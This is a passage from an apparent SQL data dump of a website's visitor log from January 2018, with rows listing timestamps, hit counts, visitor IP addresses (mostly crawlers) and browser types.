48.126','other'),(200375,1516564583,1,1,0,0,'8.29.198.27','other'),(200376,1516564909,4,4,0,0,'216.244.66.246','other'),(200377,1516565479,1,1,0,0,'87.250.224.46','other'),(200378,1516565516,1,1,0,0,'40.77.167.4','other'),(200379,1516565567,1,1,0,0,'54.36.148.166','other'),(200380,1516565585,1,1,0,0,'79.111.91.82','chrome'),(200381,1516565603,1,1,0,0,'54.36.148.172','other'),(200382,1516565606,1,1,0,0,'54.36.149.55','other'),(200383,1516565974,3,3,0,0,'178.154.171.88','other'),(200384,1516565995,1,1,0,0,'54.36.148.106','other'),(200385,1516566027,1,1,0,0,'110.22.129.94','firefox'),(200386,1516566097,1,1,0,0,'54.36.148.35','other'),(200387,1516566278,1,1,0,0,'54.36.148.97','other'),(200388,1516566313,1,1,0,0,'54.36.148.134','other'),(200389,1516566400,1,1,0,0,'54.36.148.131','other'),(200390,1516566535,1,1,0,0,'37.9.113.101','other'),(200391,1516566717,1,1,0,0,'54.36.148.69','other'),(200392,1516566918,1,1,0,0,'54.36.148.43','other'),(200393,1516567191,1,1,0,0,'207.46.13.134','other'),(200394,1516568174,1,1,0,0,'54.36.148.171','other'),(200395,1516568474,1,1,0,0,'54.36.148.126','other'),(200396,1516569002,1,1,0,0,'54.36.149.76','other'),(200397,1516569022,1,1,0,0,'54.36.148.205','other'),(200398,1516569200,1,1,0,0,'65.55.210.85','other'),(200399,1516569346,1,1,0,0,'54.36.149.75','other'),(200400,1516569471,1,1,0,0,'157.55.39.100','other'),(200401,1516569543,1,1,0,0,'54.36.148.231','other'),(200402,1516569778,1,1,0,0,'54.36.149.56','other'),(200403,1516569894,1,1,0,0,'54.36.148.44','other'),(200404,1516569964,1,1,0,0,'54.36.148.176','other'),(200405,1516570181,2,2,0,0,'216.244.66.246','other'),(200406,1516570279,1,1,0,0,'54.36.148.83','other'),(200407,1516570451,1,1,0,0,'54.36.148.106','other'),(200408,1516570498,1,1,0,0,'54.36.148.249','other'),(200409,1516570651,1,1,0,0,'54.36.148.144','other'),(200410,1516570953,1,1,0,0,'91.209.11.236','other'),(200411,1516571024,1,0,1,0,'66.249.64.29',''),(200412,1516571245,1,1,0,0,'51.255.71.115','other'),(200413,1516571337,1,1,0,0,'51.255.71.113','other'),(200414,1516571646,1,1,0,0,'54.36.149.25','other'),(200415,1516571968,1,1,0,0,'54.36.149.36','other'),(200416,1516572115,1,1,0,0,'54.36.149.94','other'),(200417,1516572493,1,1,0,0,'54.36.148.28','other'),(200418,1516573112,1,1,0,0,'54.36.148.157','other'),(200419,1516573165,1,1,0,0,'54.36.149.80','other'),(200420,1516573333,4,4,0,0,'216.244.66.194','other'),(200421,1516573449,1,1,0,0,'54.36.149.67','other'),(200422,1516573746,1,1,0,0,'54.36.148.93','other'),(200423,1516574117,3,3,0,0,'216.244.66.246','other'),(200424,1516574235,1,1,0,0,'54.36.148.100','other'),(200425,1516574458,1,1,0,0,'216.244.66.194','other'),(200426,1516574476,1,1,0,0,'157.55.39.100','other'),(200427,1516574940,1,1,0,0,'54.36.148.98','other'),(200428,1516575015,1,1,0,0,'54.36.148.24','other'),(200429,1516575078,1,1,0,0,'162.210.196.97','other'),(200430,1516575141,1,1,0,0,'54.36.148.125','other'),(200431,1516575165,1,1,0,0,'77.40.129.123','firefox'),(200432,1516575333,1,1,0,0,'52.27.2.86','msie'),(200433,1516575343,1,1,0,0,'50.19.154.226','msie'),(200434,1516575419,1,1,0,0,'8.29.198.25','other'),(200435,1516575579,1,1,0,0,'54.36.148.245','other'),(200436,1516575623,1,1,0,0,'54.36.149.86','other'),(200437,1516575676,1,1,0,0,'54.36.148.207','other'),(200438,1516575827,1,1,0,0,'54.36.148.248','other'),(200439,1516576474,52,52,0,0,'198.204.243.138','other'),(200440,1516576536,1,1,0,0,'91.209.11.236','other'),(200441,1516577087,1,1,0,0,'54.36.148.84','other'),(200442,1516577351,1,1,0,0,'51.255.71.128','other'),(200443,1516577538,1,1,0,0,'54.36.148.121','other'),(200444,1516578101,1,1,0,0,'54.36.149.44','other'),(200445,1516578270,1,1,0,0,'54.36.148.13','other'),(200446,1516578308,1,1,0,0,'54.36.149.78','other'),(200447,1516578393,1,1,0,0,'54.36.148.69','other'),(200448,1516578948,1,1,0,0,'91.209.11.236','other'),(200449,1516579337,1,1,0,0,'54.36.148.56','other'),(200450,1516579373,1,1,0,0,'54.36.148.229','other'),(200451,1516580155,1,1,0,0,'54.36.148.189','other'),(200452,1516580431,1,1,0,0,'207.46.13.134','other'),(200453,1516581142,1,1,0,0,'54.36.148.29','other'),(200454,1516582073,1,1,0,0,'54.36.149.103','other'),(200455,1516582407,1,1,0,0,'54.36.148.249','other'),(200456,1516583038,1,1,0,0,'51.255.71.126','other'),(200457,1516583299,1,1,0,0,'217.69.134.174','other'),(200458,1516583588,1,1,0,0,'54.36.149.9','other'),(200459,1516583742,1,1,0,0,'54.36.148.138','other'),(200460,1516583941,1,1,0,0,'54.36.148.166','other'),(200461,1516583976,1,1,0,0,'54.36.148.66','other'),(200462,1516584100,1,1,0,0,'178.154.171.88','other'),(200463,1516584175,1,1,0,0,'54.36.149.85','other'),(200464,1516584321,1,1,0,0,'207.46.13.134','other'),(200465,1516584498,1,1,0,0,'54.36.149.44','other'),(200466,1516584556,1,1,0,0,'54.36.148.232','other'),(200467,1516584644,49,49,0,0,'185.208.208.198','other'),(200468,1516584945,1,1,0,0,'54.36.148.149','other'),(200469,1516584987,2,2,0,0,'216.244.66.194','other'),(200470,1516585209,1,1,0,0,'54.36.148.83','other'),(200471,1516585381,1,1,0,0,'91.209.11.236','other'),(200472,1516585392,1,1,0,0,'207.46.13.134','other'),(200473,1516585570,12,12,0,0,'185.208.208.198','other'),(200474,1516585584,1,1,0,0,'54.36.149.30','other'),(200475,1516585616,3,3,0,0,'216.244.66.246','other'),(200476,1516585832,1,1,0,0,'47.89.105.201','chrome'),(200477,1516585973,1,1,0,0,'54.36.149.27','other'),(200478,1516586092,1,1,0,0,'217.69.133.221','other'),(200479,1516586254,1,1,0,0,'8.29.198.27','other'),(200480,1516587818,1,1,0,0,'54.36.148.177','other'),(200481,1516587856,1,1,0,0,'91.209.11.236','other'),(200482,1516588126,1,1,0,0,'54.36.148.30','other'),(200483,1516588354,1,1,0,0,'54.36.148.172','other'),(200484,1516588361,1,1,0,0,'54.36.148.44','other'),(200485,1516589181,1,1,0,0,'54.36.148.251','other'),(200486,1516589314,1,1,0,0,'157.55.39.100','other'),(200487,1516590308,3,3,0,0,'216.244.66.246','other'),(200488,1516590495,1,1,0,0,'54.36.148.62','other'),(200489,1516590559,1,1,0,0,'54.36.149.107','other'),(200490,1516591080,1,1,0,0,'37.145.10.63','msie'),(200491,1516591572,1,1,0,0,'54.36.148.135','other'),(200492,1516591579,1,1,0,0,'91.209.11.236','other'),(200493,1516592114,1,1,0,0,'54.36.149.42','other'),(200494,1516592530,1,1,0,0,'54.36.148.189','other'),(200495,1516592910,1,1,0,0,'37.53.183.32','chrome'),(200496,1516593233,1,1,0,0,'54.36.149.56','other'),(200497,1516594546,1,1,0,0,'54.36.148.147','other'),(200498,1516594553,1,1,0,0,'54.36.148.89','other'),(200499,1516594600,1,1,0,0,'54.36.148.34','other'),(200500,1516594675,7,7,0,0,'216.244.66.194','other'),(200501,1516594822,1,1,0,0,'54.36.148.113','other'),(200502,1516594942,1,1,0,0,'54.36.148.243','other'),(200503,1516595797,1,1,0,0,'120.35.38.172','msie'),(200504,1516596149,1,1,0,0,'216.244.66.246','other'),(200505,1516596318,1,1,0,0,'54.36.148.200','other'),(200506,1516596538,1,1,0,0,'54.36.148.193','other'),(200507,1516596541,1,1,0,0,'54.36.148.164','other'),(200508,1516596689,1,1,0,0,'110.22.129.94','firefox'),(200509,1516596806,1,1,0,0,'207.46.13.134','other'),(200510,1516597086,1,1,0,0,'8.29.198.27','other'),(200511,1516597360,1,1,0,0,'54.36.149.60','other'),(200512,1516597651,1,1,0,0,'54.36.148.65','other'),(200513,1516597822,1,1,0,0,'91.209.11.236','other'),(200514,1516598674,1,1,0,0,'54.36.149.88','other'),(200515,1516599286,1,1,0,0,'54.36.148.75','other'),(200516,1516599491,1,1,0,0,'54.36.148.11','other'),(200517,1516599934,1,1,0,0,'37.9.113.182','other'),(200518,1516600381,1,1,0,0,'54.36.148.153','other'),(200519,1516600438,1,1,0,0,'54.36.148.206','other'),(200520,1516600470,1,1,0,0,'91.196.178.91','chrome'),(200521,1516600641,1,1,0,0,'54.36.149.57','other'),(200522,1516600722,1,1,0,0,'216.244.66.246','other'),(200523,1516600767,1,1,0,0,'54.36.148.133','other'),(200524,1516601363,1,1,0,0,'54.36.149.74','other'),(200525,1516601718,1,1,0,0,'54.36.148.19','other'),(200526,1516602560,1,1,0,0,'54.36.148.174','other'),(200527,1516602736,1,1,0,0,'54.36.148.46','other'),(200528,1516602781,1,1,0,0,'162.210.196.97','other'),(200529,1516602881,1,1,0,0,'51.255.71.126','other'),(200530,1516603216,1,1,0,0,'54.36.149.17','other'),(200531,1516603825,1,1,0,0,'54.36.149.28','other'),(200532,1516604132,1,1,0,0,'91.196.178.163','chrome'),(200533,1516604215,1,1,0,0,'54.36.148.192','other'),(200534,1516604500,1,1,0,0,'178.62.137.173','chrome'),(200535,1516604559,1,1,0,0,'54.36.148.149','other'),(200536,1516604569,1,1,0,0,'91.196.178.91','chrome'),(200537,1516604618,5,5,0,0,'216.244.66.194','other'),(200538,1516604771,1,1,0,0,'54.36.148.45','other'),(200539,1516605114,1,1,0,0,'91.196.178.163','chrome'),(200540,1516605242,1,1,0,0,'54.36.148.255','other'),(200541,1516605306,1,1,0,0,'91.196.178.166','chrome'),(200542,1516605344,1,1,0,0,'54.36.148.238','other'),(200543,1516605375,1,1,0,0,'54.36.148.107','other'),(200544,1516605521,1,1,0,0,'54.36.148.29','other'),(200545,1516605587,1,1,0,0,'54.36.149.85','other'),(200546,1516605594,1,1,0,0,'216.244.66.246','other'),(200547,1516605617,1,1,0,0,'176.122.105.147','chrome'),(200548,1516605840,1,1,0,0,'91.196.178.65','chrome'),(200549,1516605938,1,1,0,0,'54.36.148.118','other'),(200550,1516606057,1,1,0,0,'91.196.178.163','chrome'),(200551,1516606178,1,1,0,0,'40.77.167.41','other'),(200552,1516606292,1,1,0,0,'54.36.148.206','other'),(200553,1516606334,1,1,0,0,'54.36.148.251','other'),(200554,1516606814,1,1,0,0,'217.69.133.224','other'),(200555,1516607180,1,1,0,0,'54.36.148.171','other'),(200556,1516607191,1,1,0,0,'54.36.149.66','other'),(200557,1516607259,1,1,0,0,'91.196.178.100','chrome'),(200558,1516607384,1,1,0,0,'195.230.119.34','chrome'),(200559,1516607417,1,1,0,0,'54.36.148.10','other'),(200560,1516607551,1,1,0,0,'37.54.160.61','chrome'),(200561,1516607670,1,1,0,0,'82.119.119.206','firefox'),(200562,1516607719,1,1,0,0,'91.196.178.65','chrome'),(200563,1516607793,1,1,0,0,'54.36.148.233','other'),(200564,1516607826,2,2,0,0,'141.8.142.74','other'),(200565,1516607867,1,1,0,0,'54.36.148.204','other'),(200566,1516607915,1,1,0,0,'8.29.198.26','other'),(200567,1516608469,1,1,0,0,'54.36.148.51','other'),(200568,1516608576,1,1,0,0,'46.173.172.162','chrome'),(200569,1516608721,1,1,0,0,'54.36.148.181','other'),(200570,1516608823,1,1,0,0,'217.69.133.85','other'),(200571,1516608947,1,1,0,0,'54.36.148.190','other'),(200572,1516609089,1,1,0,0,'54.36.148.130','other'),(200573,1516609117,1,1,0,0,'77.52.200.10','chrome'),(200574,1516609145,1,1,0,0,'54.36.148.122','other'),(200575,1516609453,1,1,0,0,'91.196.178.163','chrome'),(200576,1516609545,1,1,0,0,'141.8.142.74','other'),(200577,1516609574,1,1,0,0,'54.36.148.237','other'),(200578,1516609828,1,1,0,0,'95.132.40.111','firefox'),(200579,1516610504,1,1,0,0,'91.196.178.35','chrome'),(200580,1516610851,2,2,0,0,'216.244.66.246','other'),(200581,1516610962,1,1,0,0,'40.77.167.38','other'),(200582,1516611121,2,0,2,0,'66.249.66.199',''),(200583,1516611122,1,1,0,0,'46.188.58.205','msie'),(200584,1516611479,1,1,0,0,'31.43.3.49','chrome'),(200585,1516611540,1,1,0,0,'141.8.142.74','other'),(200586,1516611659,1,1,0,0,'54.36.148.207','other'),(200587,1516611745,1,1,0,0,'54.36.149.7','other'),(200588,1516611780,1,1,0,0,'194.146.136.226','chrome'),(200589,1516612174,1,1,0,0,'91.236.184.19','firefox'),(200590,1516612176,1,1,0,0,'54.36.149.29','other'),(200591,1516612189,1,1,0,0,'54.36.148.52','other'),(200592,1516612237,1,1,0,0,'54.36.148.181','other'),(200593,1516612399,2,2,0,0,'91.196.178.65','chrome'),(200594,1516612547,1,1,0,0,'91.196.178.79','chrome'),(200595,1516612592,30,30,0,0,'144.76.8.231','other'),(200596,1516612711,1,1,0,0,'54.36.149.35','other'),(200597,1516612974,1,1,0,0,'54.36.148.42','other'),(200598,1516613118,1,1,0,0,'54.36.148.138','other'),(200599,1516613311,1,1,0,0,'91.209.11.236','other'),(200600,1516613336,1,1,0,0,'91.213.33.104','firefox'),(200601,1516613344,1,1,0,0,'54.36.149.77','other'),(200602,1516614167,1,1,0,0,'207.46.13.34','other'),(200603,1516614177,1,1,0,0,'91.196.178.163','chrome'),(200604,1516614573,1,1,0,0,'54.36.148.139','other'),(200605,1516614779,7,7,0,0,'216.244.66.194','other'),(200606,1516614857,1,1,0,0,'54.36.148.188','other'),(200607,1516614903,1,1,0,0,'54.36.148.60','other'),(200608,1516614931,1,1,0,0,'54.36.148.84','other'),(200609,1516614953,1,1,0,0,'54.36.148.56','other'),(200610,1516615032,1,1,0,0,'91.218.228.179','chrome'),(200611,1516615289,1,1,0,0,'54.36.148.164','other'),(200612,1516615928,12,12,0,0,'69.30.198.242','other'),(200613,1516616354,1,1,0,0,'54.36.148.114','other'),(200614,1516616377,2,2,0,0,'216.244.66.246','other'),(200615,1516616428,1,1,0,0,'66.249.66.157','chrome'),(200616,1516616438,1,1,0,0,'91.196.178.163','firefox'),(200617,1516616709,1,1,0,0,'54.36.148.199','other'),(200618,1516616881,1,1,0,0,'91.196.178.163','chrome'),(200619,1516617710,1,1,0,0,'54.36.148.28','other'),(200620,1516618096,1,1,0,0,'194.44.197.19','chrome'),(200621,1516618343,1,1,0,0,'66.249.66.201','chrome'),(200622,1516618376,1,1,0,0,'95.28.59.5','msie'),(200623,1516618397,1,1,0,0,'91.196.178.169','chrome'),(200624,1516618476,1,1,0,0,'91.196.178.164','chrome'),(200625,1516618507,1,1,0,0,'54.36.148.229','other'),(200626,1516618748,1,1,0,0,'8.29.198.25','other'),(200627,1516618800,1,1,0,0,'54.36.148.155','other'),(200628,1516618950,1,1,0,0,'54.36.148.116','other'),(200629,1516619374,1,0,1,0,'66.249.66.157',''),(200630,1516619811,1,1,0,0,'54.36.149.65','other'),(200631,1516620284,1,1,0,0,'37.9.113.100','other'),(200632,1516620475,1,1,0,0,'54.36.149.18','other'),(200633,1516620554,1,1,0,0,'213.180.203.8','other'),(200634,1516620774,1,1,0,0,'54.36.148.62','other'),(200635,1516620799,1,1,0,0,'54.36.149.29','other'),(200636,1516621018,1,1,0,0,'54.36.148.113','other'),(200637,1516621211,5,5,0,0,'216.244.66.246','other'),(200638,1516621238,1,1,0,0,'54.36.148.14','other'),(200639,1516621409,1,1,0,0,'54.36.149.66','other'),(200640,1516621414,1,1,0,0,'217.69.133.223','other'),(200641,1516622147,1,1,0,0,'54.36.148.69','other'),(200642,1516622264,1,1,0,0,'54.36.148.98','other'),(200643,1516622909,1,1,0,0,'54.36.148.251','other'),(200644,1516623170,1,1,0,0,'217.69.134.154','other'),(200645,1516623222,1,1,0,0,'213.180.203.7','other'),(200646,1516623226,1,1,0,0,'5.45.207.83','other'),(200647,1516623323,1,1,0,0,'54.36.149.9','other'),(200648,1516623364,1,1,0,0,'54.36.149.86','other'),(200649,1516623691,1,1,0,0,'91.196.178.65','chrome'),(200650,1516623706,1,1,0,0,'207.46.13.134','other'),(200651,1516623732,1,1,0,0,'91.196.178.166','chrome'),(200652,1516623852,1,1,0,0,'37.9.113.132','other'),(200653,1516624065,1,1,0,0,'37.55.56.152','firefox'),(200654,1516624386,1,1,0,0,'54.36.148.13','other'),(200655,1516624663,1,1,0,0,'54.36.148.71','other'),(200656,1516624706,1,1,0,0,'91.196.177.47','chrome'),(200657,1516624743,1,1,0,0,'54.36.149.40','other'),(200658,1516624941,1,1,0,0,'178.92.171.139','chrome'),(200659,1516624965,1,1,0,0,'54.36.149.34','other'),(200660,1516625258,1,1,0,0,'54.36.149.15','other'),(200661,1516625282,1,1,0,0,'93.170.189.194','chrome'),(200662,1516625440,2,0,2,0,'66.249.66.156',''),(200663,1516625479,1,0,1,0,'66.249.66.27',''),(200664,1516625590,2,2,0,0,'95.158.3.62','chrome'),(200665,1516625603,1,1,0,0,'54.36.148.43','other'),(200666,1516625675,3,3,0,0,'216.244.66.194','other'),(200667,1516625853,1,1,0,0,'54.36.148.93','other'),(200668,1516626078,1,1,0,0,'51.255.71.126','other'),(200669,1516626125,1,1,0,0,'216.244.66.246','other'),(200670,1516626184,1,1,0,0,'54.36.149.31','other'),(200671,1516626515,1,1,0,0,'91.196.178.169','chrome'),(200672,1516627249,1,1,0,0,'54.36.148.179','other'),(200673,1516627297,1,1,0,0,'37.9.113.157','other'),(200674,1516627577,1,1,0,0,'37.9.113.182','other'),(200675,1516627744,1,1,0,0,'92.112.105.232','chrome'),(200676,1516627780,1,1,0,0,'54.36.148.207','other'),(200677,1516627937,1,1,0,0,'91.196.178.91','firefox'),(200678,1516628160,1,1,0,0,'54.36.149.65','other'),(200679,1516628267,1,1,0,0,'77.222.134.101','other'),(200680,1516628409,1,1,0,0,'54.36.148.68','other'),(200681,1516628741,1,1,0,0,'91.196.178.134','firefox'),(200682,1516629092,1,1,0,0,'54.36.148.116','other'),(200683,1516629131,1,1,0,0,'54.36.148.202','other'),(200684,1516629164,1,1,0,0,'54.36.148.28','other'),(200685,1516629232,1,1,0,0,'54.36.149.89','other'),(200686,1516629525,1,1,0,0,'54.36.149.54','other'),(200687,1516629574,1,1,0,0,'8.29.198.26','other'),(200688,1516630060,1,1,0,0,'54.36.149.104','other'),(200689,1516630408,1,1,0,0,'125.209.235.175','other'),(200690,1516630413,1,1,0,0,'37.52.22.245','firefox'),(200691,1516631173,1,1,0,0,'54.36.149.98','other'),(200692,1516631255,4,4,0,0,'216.244.66.246','other'),(200693,1516631293,1,1,0,0,'40.77.167.38','other'),(200694,1516631307,1,1,0,0,'91.196.178.65','chrome'),(200695,1516631395,1,1,0,0,'91.196.178.91','chrome'),(200696,1516631700,1,1,0,0,'54.36.148.154','other'),(200697,1516631726,1,1,0,0,'54.36.148.197','other'),(200698,1516631825,1,1,0,0,'54.36.148.59','other'),(200699,1516632498,1,1,0,0,'66.249.66.158','chrome'),(200700,1516632599,2,2,0,0,'91.196.178.65','chrome'),(200701,1516632871,1,1,0,0,'46.211.100.253','other'),(200702,1516632926,1,1,0,0,'54.36.148.138','other'),(200703,1516633203,1,1,0,0,'54.36.148.50','other'),(200704,1516633275,1,1,0,0,'157.55.39.100','other'),(200705,1516633367,1,1,0,0,'54.36.148.156','other'),(200706,1516633603,1,1,0,0,'54.36.148.238','other'),(200707,1516633677,1,1,0,0,'54.36.148.70','other'),(200708,1516633901,1,1,0,0,'37.146.180.101','msie'),(200709,1516634256,1,1,0,0,'199.58.86.211','other'),(200710,1516634370,1,1,0,0,'54.36.149.82','other'),(200711,1516634623,1,1,0,0,'54.36.148.163','other'),(200712,1516634732,2,2,0,0,'82.207.121.233','chrome'),(200713,1516634771,1,1,0,0,'54.36.148.249','other'),(200714,1516634791,1,1,0,0,'207.46.13.34','other'),(200715,1516634938,1,1,0,0,'54.36.148.69','other'),(200716,1516634992,1,1,0,0,'188.230.43.254','other'),(200717,1516635279,1,1,0,0,'54.36.148.12','other'),(200718,1516635406,1,1,0,0,'54.36.148.92','other'),(200719,1516635896,1,1,0,0,'188.230.43.254','other'),(200720,1516635937,1,1,0,0,'54.36.148.206','other'),(200721,1516635944,1,1,0,0,'157.55.39.100','other'),(200722,1516636017,1,1,0,0,'54.36.149.30','other'),(200723,1516636222,3,3,0,0,'216.244.66.246','other'),(200724,1516636226,1,1,0,0,'54.36.148.137','other'),(200725,1516636573,1,1,0,0,'54.36.149.94','other'),(200726,1516636635,1,1,0,0,'54.36.148.81','other'),(200727,1516636878,1,1,0,0,'54.36.148.141','other'),(200728,1516636951,1,1,0,0,'91.196.193.109','chrome'),(200729,1516637166,1,1,0,0,'54.36.148.129','other'),(200730,1516637178,9,9,0,0,'216.244.66.194','other'),(200731,1516637288,1,1,0,0,'54.36.148.105','other'),(200732,1516637334,1,1,0,0,'54.36.148.188','other'),(200733,1516637426,1,1,0,0,'54.36.148.242','other'),(200734,1516637438,1,1,0,0,'91.196.178.85','firefox'),(200735,1516637702,1,1,0,0,'91.244.8.140','chrome'),(200736,1516637989,1,1,0,0,'188.230.43.254','other'),(200737,1516638336,1,0,1,0,'66.249.66.18',''),(200738,1516638872,1,1,0,0,'54.36.148.126','other'),(200739,1516638914,1,1,0,0,'54.36.148.29','other'),(200740,1516638922,1,1,0,0,'54.36.148.183','other'),(200741,1516638985,1,1,0,0,'54.36.148.41','other'),(200742,1516639095,1,1,0,0,'194.44.44.18','chrome'),(200743,1516639521,1,1,0,0,'54.36.148.32','other'),(200744,1516639659,1,1,0,0,'54.36.148.65','other'),(200745,1516639696,1,1,0,0,'91.196.178.129','chrome'),(200746,1516639851,1,1,0,0,'157.55.39.100','other'),(200747,1516640396,1,1,0,0,'188.230.43.254','other'),(200748,1516640400,1,1,0,0,'8.29.198.25','other'),(200749,1516640413,1,1,0,0,'54.36.149.9','other'),(200750,1516640483,1,1,0,0,'54.36.149.6','other'),(200751,1516641571,1,0,1,0,'66.249.66.18',''),(200752,1516641594,1,1,0,0,'54.36.148.157','other'),(200753,1516641628,2,2,0,0,'216.244.66.246','other'),(200754,1516641637,1,1,0,0,'91.196.178.163','chrome'),(200755,1516642027,1,1,0,0,'54.36.148.163','other'),(200756,1516642189,1,1,0,0,'54.36.148.242','other'),(200757,1516642340,1,1,0,0,'54.36.149.67','other'),(200758,1516642362,1,1,0,0,'54.36.148.76','other'),(200759,1516642457,1,1,0,0,'37.55.224.168','chrome'),(200760,1516642710,1,1,0,0,'54.36.148.141','other'),(200761,1516642791,1,1,0,0,'188.230.43.254','other'),(200762,1516643008,1,1,0,0,'54.36.148.144','other'),(200763,1516643048,1,1,0,0,'217.69.133.84','other'),(200764,1516643339,1,1,0,0,'54.36.148.49','other'),(200765,1516643606,1,1,0,0,'54.36.148.196','other'),(200766,1516643781,1,1,0,0,'54.36.148.181','other'),(200767,1516643886,1,0,1,0,'66.249.66.195',''),(200768,1516643907,1,1,0,0,'51.255.71.129','other'),(200769,1516644057,1,1,0,0,'82.144.200.186','firefox'),(200770,1516644518,1,1,0,0,'54.36.148.129','other'),(200771,1516644600,1,1,0,0,'159.224.109.252','chrome'),(200772,1516645196,1,1,0,0,'188.230.43.254','other'),(200773,1516645248,1,1,0,0,'54.36.148.139','other'),(200774,1516645428,1,1,0,0,'54.36.148.22','other'),(200775,1516645548,1,0,1,0,'66.249.66.157',''),(200776,1516646451,1,1,0,0,'54.36.148.50','other'),(200777,1516646733,2,2,0,0,'46.161.9.52','chrome'),(200778,1516646770,1,1,0,0,'54.36.148.204','other'),(200779,1516646817,2,2,0,0,'216.244.66.246','other'),(200780,1516646994,1,1,0,0,'93.76.88.42','other'),(200781,1516647149,1,1,0,0,'188.163.32.4','msie'),(200782,1516647456,3,3,0,0,'216.244.66.194','other'),(200783,1516647595,1,1,0,0,'188.230.43.254','other'),(200784,1516647709,1,0,1,0,'66.249.66.155',''),(200785,1516648443,1,1,0,0,'54.36.148.52','other'),(200786,1516648572,1,1,0,0,'91.196.178.60','chrome'),(200787,1516648855,1,1,0,0,'54.36.148.69','other'),(200788,1516649696,1,1,0,0,'51.255.71.132','other'),(200789,1516649825,1,1,0,0,'54.36.149.81','other'),(200790,1516650358,1,1,0,0,'54.36.149.66','other'),(200791,1516650758,1,1,0,0,'54.36.149.58','other'),(200792,1516650977,1,1,0,0,'54.36.148.84','other'),(200793,1516651001,1,1,0,0,'54.36.148.77','other'),(200794,1516651046,1,1,0,0,'37.9.113.134','other'),(200795,1516651051,1,1,0,0,'37.9.113.138','other'),(200796,1516651080,1,1,0,0,'54.36.149.23','other'),(200797,1516651183,1,1,0,0,'188.163.32.4','msie'),(200798,1516651236,1,1,0,0,'8.29.198.27','other'),(200799,1516651885,1,1,0,0,'54.36.148.130','other'),(200800,1516652006,1,1,0,0,'5.166.239.31','msie'),(200801,1516652142,2,2,0,0,'216.244.66.246','other'),(200802,1516652252,1,1,0,0,'54.36.149.62','other'),(200803,1516652372,1,1,0,0,'54.36.148.126','other'),(200804,1516652472,1,1,0,0,'54.36.148.191','other'),(200805,1516653035,1,1,0,0,'54.36.148.163','other'),(200806,1516653461,1,1,0,0,'54.36.148.35','other'),(200807,1516653698,1,1,0,0,'37.9.113.110','other'),(200808,1516653831,1,1,0,0,'54.36.148.250','other'),(200809,1516654005,1,1,0,0,'37.73.209.99','chrome'),(200810,1516654517,1,1,0,0,'54.36.148.87','other'),(200811,1516654540,1,1,0,0,'54.36.149.9','other'),(200812,1516654739,1,1,0,0,'54.36.149.74','other'),(200813,1516654993,1,1,0,0,'54.36.148.29','other'),(200814,1516655013,1,1,0,0,'141.8.132.22','other'),(200815,1516655261,1,1,0,0,'54.36.149.23','other'),(200816,1516655432,1,1,0,0,'207.46.13.34','other'),(200817,1516655485,1,1,0,0,'54.36.148.247','other'),(200818,1516655629,1,1,0,0,'54.36.149.101','other'),(200819,1516655744,1,1,0,0,'37.9.113.157','other'),(200820,1516656035,1,1,0,0,'144.76.8.134','other'),(200821,1516656323,1,1,0,0,'188.163.32.4','chrome'),(200822,1516656542,1,1,0,0,'54.36.148.133','other'),(200823,1516656646,1,1,0,0,'54.36.149.84','other'),(200824,1516656865,1,1,0,0,'173.252.123.185','other'),(200825,1516656877,1,1,0,0,'195.88.158.69','chrome'),(200826,1516656912,1,1,0,0,'54.36.148.124','other'),(200827,1516657260,3,3,0,0,'216.244.66.246','other'),(200828,1516657361,1,1,0,0,'54.36.148.128','other'),(200829,1516657433,3,3,0,0,'216.244.66.194','other'),(200830,1516657507,1,1,0,0,'91.209.11.236','other'),(200831,1516657568,1,1,0,0,'54.146.30.205','firefox'),(200832,1516657682,1,1,0,0,'54.36.148.232','other'),(200833,1516657723,1,1,0,0,'207.46.13.165','other'),(200834,1516658625,2,2,0,0,'216.244.66.194','other'),(200835,1516658663,1,1,0,0,'54.36.148.207','other'),(200836,1516658794,1,1,0,0,'54.36.148.128','other'),(200837,1516658981,1,1,0,0,'217.69.136.210','other'),(200838,1516659242,1,1,0,0,'54.36.149.8','other'),(200839,1516659433,1,1,0,0,'54.36.148.70','other'),(200840,1516659612,1,1,0,0,'91.196.178.3','chrome'),(200841,1516659617,1,1,0,0,'51.255.71.114','other'),(200842,1516661283,1,0,1,0,'66.249.66.199',''),(200843,1516661506,1,1,0,0,'54.36.149.33','other'),(200844,1516661790,1,1,0,0,'54.36.148.132','other'),(200845,1516661865,1,1,0,0,'54.36.149.84','other'),(200846,1516662057,2,2,0,0,'216.244.66.246','other'),(200847,1516662067,1,1,0,0,'8.29.198.27','other'),(200848,1516662308,4,4,0,0,'198.204.244.90','other'),(200849,1516662579,1,1,0,0,'217.69.133.60','other'),(200850,1516662878,1,1,0,0,'54.36.148.66','other'),(200851,1516663215,1,1,0,0,'54.36.148.59','other'),(200852,1516663266,1,1,0,0,'54.36.148.240','other'),(200853,1516663404,1,1,0,0,'178.154.200.32','other'),(200854,1516663419,1,1,0,0,'91.209.11.236','other'),(200855,1516663579,1,1,0,0,'54.36.149.10','other'),(200856,1516663815,1,1,0,0,'54.36.149.104','other'),(200857,1516663857,1,1,0,0,'54.36.148.124','other'),(200858,1516664395,1,1,0,0,'95.108.181.111','other'),(200859,1516664969,1,1,0,0,'54.36.148.167','other'),(200860,1516665070,1,1,0,0,'54.36.148.11','other'),(200861,1516665089,1,1,0,0,'54.36.148.147','other'),(200862,1516665236,1,1,0,0,'54.36.148.165','other'),(200863,1516665416,1,1,0,0,'54.36.148.19','other'),(200864,1516665455,1,1,0,0,'54.36.149.57','other'),(200865,1516665593,1,1,0,0,'54.36.149.41','other'),(200866,1516665767,1,1,0,0,'157.55.39.100','other'),(200867,1516665965,1,1,0,0,'217.69.136.204','other'),(200868,1516665977,1,1,0,0,'54.36.148.192','other'),(200869,1516666207,1,1,0,0,'51.255.71.131','other'),(200870,1516666554,1,1,0,0,'54.36.148.168','other'),(200871,1516666917,1,1,0,0,'54.36.149.107','other'),(200872,1516667094,1,1,0,0,'93.76.88.42','other'),(200873,1516667224,1,1,0,0,'54.36.148.75','other'),(200874,1516667240,5,5,0,0,'216.244.66.246','other'),(200875,1516667727,1,1,0,0,'54.36.148.47','other'),(200876,1516667791,4,4,0,0,'216.244.66.194','other'),(200877,1516667974,1,1,0,0,'54.36.148.64','other'),(200878,1516668006,1,1,0,0,'54.36.148.23','other'),(200879,1516668103,1,1,0,0,'54.36.149.73','other'),(200880,1516668372,1,1,0,0,'54.36.148.117','other'),(200881,1516668944,1,1,0,0,'54.36.149.68','other'),(200882,1516669307,1,1,0,0,'217.69.133.242','other'),(200883,1516669554,1,1,0,0,'54.36.148.28','other'),(200884,1516669625,1,1,0,0,'217.69.133.245','other'),(200885,1516669963,1,1,0,0,'54.36.149.29','other'),(200886,1516670074,1,1,0,0,'54.36.148.149','other'),